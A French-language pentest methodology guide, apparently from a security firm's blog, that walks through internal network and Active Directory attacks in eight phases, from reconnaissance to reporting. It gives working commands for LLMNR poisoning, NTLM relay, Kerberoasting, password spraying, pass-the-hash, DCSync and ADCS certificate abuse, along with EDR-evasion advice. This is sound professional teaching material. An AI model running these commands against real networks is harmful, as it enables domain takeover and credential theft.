Le pentest réseau interne est l exercice le plus révélateur de la posture de sécurité réelle d une organisation. Contrairement au pentest externe qui teste le périmètre, le pentest interne simule un attaquant ayant obtenu un accès initial au réseau (via phishing, accès physique ou compromission d un poste). Ce guide Red Team détaille la méthodologie complète en 8 phases, des outils à utiliser aux techniques d évasion, en passant par la documentation des preuves. Conçu pour les pentesters confirmés et les responsables sécurité, il couvre les scénarios d attaque les plus courants rencontrés en entreprise en 2026 : compromission AD, mouvement latéral, élévation de privilèges et exfiltration de données.

En bref

  • Méthodologie en 8 phases du point d accès initial à l exfiltration
  • Outils recommandés à chaque étape avec exemples de commandes
  • Focus sur les techniques d évasion EDR/AV modernes
  • Modèle de rapport de pentest interne inclus

Phase 1 : Reconnaissance réseau initiale

Dès l obtention d un accès réseau (port Ethernet, Wi-Fi corporate, VPN), la première étape est la cartographie silencieuse du réseau :

# Découverte passive ARP
arp-scan --localnet --interface eth0

# Scan réseau silencieux (SYN scan, timing lent)
nmap -sS -T2 -Pn --top-ports 1000 -oA internal_scan 10.0.0.0/16

# Découverte des services via mDNS/LLMNR
responder --analyze -I eth0

# Identification des contrôleurs de domaine
nmap -p 389,636,88,445 -sV 10.0.0.0/16 --open

Évasion EDR

Les solutions EDR modernes détectent les scans Nmap classiques. Utilisez des techniques de fragmentation (-f), des scans idle (-sI) ou des outils comme ScanLess qui routent les scans via des relais légitimes sur le réseau. Adaptez le timing à l environnement.

Phase 2 : Énumération Active Directory

L Active Directory est la cible prioritaire de tout pentest interne. L énumération doit être exhaustive :

# BloodHound - Cartographie des chemins d attaque AD
bloodhound-python -u user -p password -d corp.local -c All

# Enum4linux-ng - Énumération SMB/LDAP
enum4linux-ng -A -u "" -p "" 10.0.0.1

# CrackMapExec - Énumération multi-protocole
crackmapexec smb 10.0.0.0/24 --shares -u guest -p ""
crackmapexec ldap 10.0.0.1 --users --groups

# ADRecon - Rapport HTML complet de l AD
powershell -ep bypass -c "Import-Module .\ADRecon.ps1; Invoke-ADRecon -Protocol ADWS"

Les éléments clés à identifier :

  • Chemins d attaque vers Domain Admin (BloodHound shortest paths)
  • Comptes à privilèges : DA, EA, Schema Admins, Account Operators
  • Délégations Kerberos : unconstrained, constrained, RBCD
  • SPNs vulnérables au Kerberoasting
  • GPO exploitables : scripts de login, préférences avec mots de passe

Phase 3 : Attaques d authentification

Les attaques sur les mécanismes d authentification sont souvent le chemin le plus rapide vers les privilèges élevés :

# LLMNR/NBT-NS Poisoning
responder -I eth0 -wrfv

# Relay NTLM vers LDAP (pour RBCD)
ntlmrelayx.py -t ldaps://DC01.corp.local --delegate-access

# ASREPRoasting (comptes sans pré-auth Kerberos)
GetNPUsers.py corp.local/ -usersfile users.txt -format hashcat -outputfile asrep.txt

# Kerberoasting
GetUserSPNs.py corp.local/user:password -outputfile kerberoast.txt

# Password Spraying (attention au lockout!)
crackmapexec smb DC01 -u users.txt -p "Spring2026!" --no-bruteforce

Phase 4 : Mouvement latéral

Après obtention de credentials ou de hash, le mouvement latéral permet de progresser vers les cibles prioritaires :

# Pass-the-Hash (PTH) avec CrackMapExec
crackmapexec smb targets.txt -u admin -H aad3b435b51404eeaad3b435b51404ee:hash

# WinRM (PowerShell remoting)
evil-winrm -i 10.0.0.50 -u admin -H hash

# PsExec (exécution de commandes distante)
impacket-psexec corp.local/admin@10.0.0.50 -hashes :hash

# DCOM (alternative à PsExec, souvent non détecté)
impacket-dcomexec corp.local/admin@10.0.0.50 -hashes :hash

Évasion latérale

PsExec est très détecté par les EDR. Privilégiez WMI, DCOM ou WinRM pour le mouvement latéral. Pour les environnements très surveillés, utilisez des C2 frameworks comme Sliver ou Havoc avec des canaux de communication chiffrés et des profils malleable.

Phase 5 : Élévation de privilèges

Les vecteurs d élévation de privilèges les plus courants en environnement AD :

  • Délégation non contrainte : extraction du TGT d un admin domain
  • RBCD (Resource-Based Constrained Delegation) : via relay NTLM ou contrôle d un objet computer
  • DCSync : extraction des hash NTDS via DRS replication (nécessite privileges de réplication)
  • Golden Ticket : forge de TGT avec le hash krbtgt
  • Shadow Credentials : manipulation de l attribut msDS-KeyCredentialLink
  • ADCS (Active Directory Certificate Services) : exploitation des templates de certificats vulnérables (ESC1-ESC8)
# DCSync - Extraction de tous les hash
impacket-secretsdump corp.local/admin@DC01 -just-dc

# ADCS - Recherche de templates vulnérables
certipy find -u user@corp.local -p password -dc-ip DC01

# ADCS ESC1 - Demande de certificat pour DA
certipy req -u user@corp.local -p password -ca CORP-CA -template VulnTemplate -upn administrator@corp.local

Phase 6 : Post-exploitation et exfiltration

Une fois les privilèges Domain Admin obtenus, documentez l impact et préparez les preuves :

  • Extraction d un échantillon de données sensibles (anonymisées dans le rapport)
  • Preuve d accès aux ressources critiques (ERP, bases de données, messagerie)
  • Documentation de la persistance possible (Golden Ticket, Shadow Credentials)
  • Vérification des mécanismes de détection : quelles alertes ont été générées ?

Phase 7 : Nettoyage et remise en état

Le nettoyage est une obligation professionnelle du pentester :

  • Supprimer tous les comptes et accès créés pendant le test
  • Retirer les backdoors et implants C2
  • Nettoyer les logs d activité du pentester (avec accord du client)
  • Restaurer les configurations modifiées

Phase 8 : Rapport et debriefing

Le rapport de pentest interne doit inclure :

SectionContenuAudience
Synthèse exécutiveImpact business, risques critiquesDirection
Périmètre et méthodologieScope, outils, limitationsRSSI/DSI
VulnérabilitésCVSS, preuves, exploitationÉquipe technique
Chaînes d attaqueKill chain complète documentéeSOC/Blue Team
RecommandationsPriorisées par criticité et effortTous
Plan de remédiationActions, responsables, échéancesRSSI/DSI

À retenir

Un pentest interne de qualité doit simuler un attaquant réaliste, pas un script kiddie. Les scénarios doivent refléter les TTPs des groupes APT ciblant votre secteur. Documentez chaque étape avec des captures d écran et des preuves reproductibles. Le rapport est le livrable : investissez du temps dans sa qualité.

Références : MITRE ATT&CK Framework | OWASP Testing Guide

Besoin d un pentest réseau interne ?

Nos pentesters OSCP simulent des attaques réalistes sur votre infrastructure

Demander un devis

Article recommandé

Pour approfondir les techniques AD, consultez notre Guide de Sécurisation Active Directory Windows Server 2025.